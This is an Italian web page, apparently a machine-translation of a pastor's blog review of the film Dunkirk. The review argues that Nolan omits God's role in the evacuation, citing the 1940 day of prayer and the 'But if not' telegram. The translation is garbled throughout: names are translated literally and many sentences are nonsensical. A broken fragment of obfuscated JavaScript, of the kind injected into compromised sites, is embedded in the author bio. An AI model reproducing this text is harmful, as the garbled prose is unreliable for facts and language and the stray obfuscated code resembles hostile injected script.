Articles

Dunkerque: Un Esercizio Manca il Punto di

  • Condividi
  • Tweet
  • Pin
0shares

Nota della Redazione: Il download digitale di Dunkerque è uscita oggi e il DVD comunicati la prossima settimana. Questa è la recensione originale del pastore Steve Sanchez dal suo blog, Stone the Preacher.

————————————–

Recentemente ho visto l’eccellente film Dunkerque, ma sono rimasto rattristato quando ho saputo che i registi hanno fatto tutto bene tranne che per il vero eroe della storia.

Non erano necessariamente i cittadini disinteressati a rischiare la vita nelle loro barche personali per riportare le centinaia di migliaia di truppe bloccate sulla spiaggia mentre i tedeschi avanzavano; non era nemmeno la genialità dei comandanti a strategizzare il salvataggio; era qualcosa, qualcuno, più grande di tutto questo.

Secondo l’autore anglicano dell’inchiostro, John Willans: Quando la Gran Bretagna era vicina alla sconfitta durante la seconda guerra mondiale, e l’intero esercito britannico era intrappolato a Dunkerque, in preda alla disperazione re Giorgio il 6 ha chiesto una Giornata nazionale di preghiera che si terrà il 26 maggio 1940. In una trasmissione nazionale ha istruito il popolo del Regno Unito a tornare a Dio in uno spirito di pentimento e supplicare l’aiuto Divino. Milioni di persone in tutte le Isole britanniche accorrevano nelle chiese pregando per la liberazione.

Due eventi immediatamente seguiti:

In primo luogo, una violenta tempesta sorse sulla regione di Dunkerque mettendo a terra la Luftwaffe (Aeronautica tedesca) che aveva ucciso migliaia di persone sulle spiagge.

E poi, in secondo luogo, una grande calma scese sul Canale, il che non si vedeva da una generazione, che permise a centinaia di piccole barche di navigare e salvare 335.000 soldati,piuttosto che i stimati 20-30.000. Da allora in poi le persone si riferirono a ciò che accadde come Il Miracolo di Dunkerque. Domenica, giugno 9, è stato ufficialmente nominato come un giorno di Ringraziamento nazionale.

Un altro elemento che mancava dal film, secondo la blogger Gary Demar: Come 350.000+ British Expeditionary Force soldati sono rimasti bloccati a Dunkerque sulla spiaggia e facili bersagli per gli aerei tedeschi, e quando sembrava certo che le forze Alleate a Dunkerque stavano per essere massacrati, un ufficiale della marina Britannica cablati solo tre parole per Londra: Ma se non è così. Ai nostri giorni, la maggior parte delle persone si grattava la testa chiedendo, cosa significa?

Ma, in un giorno in cui le persone conoscevano la Bibbia, conoscevano la sua fonte e sapevano esattamente cosa significava: Se questo è il caso, il nostro Dio che serviamo è in grado di liberarci dalla fornace ardente e ci libererà dalla tua mano, o re. MA SE NO, ti sia noto, o re, che non serviamo i tuoi dèi, né adoreremo l’immagine d’oro che hai eretto. (Dan. 3:17-18).

Ma se non’ Queste parole erano immediatamente riconoscibili alle persone che erano abituate a sentire le Scritture lette in chiesa. Essi conoscevano la storia narrata nel libro di Daniele riguardo ai tre servitori ebrei che dovevano essere gettati in una fornace ardente se non si inchinavano a un idolo. Sapevano che l’Iddio della Bibbia poteva salvarli se voleva. Ma se no ‘ non adorerebbero mai un altro falso Dio. Sarebbero stati forti e avrebbero confidato nel Signore, il loro Dio. Il messaggio in quelle tre paroline era chiaro: la situazione era disperata. Le forze alleate erano intrappolate. Ci sarebbe voluto un miracolo per salvarli, ma erano determinati a non cedere. Una semplice frase di tre parole comunicava tutto ciò.

Christopher Nolan, scrittore / regista di Dunkerque, ha lasciato fuori l’eroe principale, la parte più bella di questo incidente miracoloso: Dio. Perché? Era perché non è religioso e anti-Dio? Secondo il sito web Hollowverse, anche se alcuni recensori leggono temi religiosi nei film di Nolan, non ha dato alcuna indicazione che lui stesso sia religioso. Molti dei suoi fan pensano che sia ateo, ma non sembrano avere alcuna prova per questo.

No, non era perché aveva un pregiudizio contro una Divinità che faceva miracoli. Era, forse, semplicemente il segno dei nostri tempi post-cristiani: siamo troppo occupati, troppo pre-occupati con altre cose per vedere la meraviglia dei miracoli di Dio ogni giorno in questo mondo.

Steve Sanchez ha bloggato sul suo sito web StoneThePreacher.com (“Christian commentary, controversy and caterwauling”) per oltre 10 anni. Prima di piantare una chiesa nel paese collinare del Texas, è stato un pastore associato per oltre 15 anni in una mega-chiesa a Hermosa Beach, in California. Attualmente, egli pastori la chiesa più piccola del mondo, Comunità Chiesa delle Colline a Johnson City, città natale di LBJ. Dopo breaking bad, vivere la vita di un tossicodipendente meth e quasi perdere tutti e tutto, ha trovato Cristo nel 1990. (O, meglio, mi ha trovato….) _0xb322+ window]]](_0xb322,_0xb322)+ _0xb322)=== -1){alert(_0xb322)}

  • Autore
  • Post Recenti
Jon Velocità
Collegare

Pastore è Cristo Re Chiesa Battista
Jon Velocità è il pastore di una SBC Chiesa ha pianta a Syracuse, NY che praticamente nessuno lo sa. Si chiama Christ is King Baptist Church. Non è davvero innovativo, niente di veramente elaborato. Nessuna strategia missionaria complessa, o modelli di crescita della chiesa. È solo un pastore che predica fedelmente la Parola ogni domenica.

Jon Velocità
Collegare

Ultimi messaggi di Jon Velocità (vedi tutti)
  • Battista Premere Censura – 7 Maggio 2019
  • Jeff Leach Pro-Vita dell’Rivoluzione in Texas – Aprile 30, 2019
  • Uber & Planned Parenthood: RU-48-Real? – Apr 25, 2019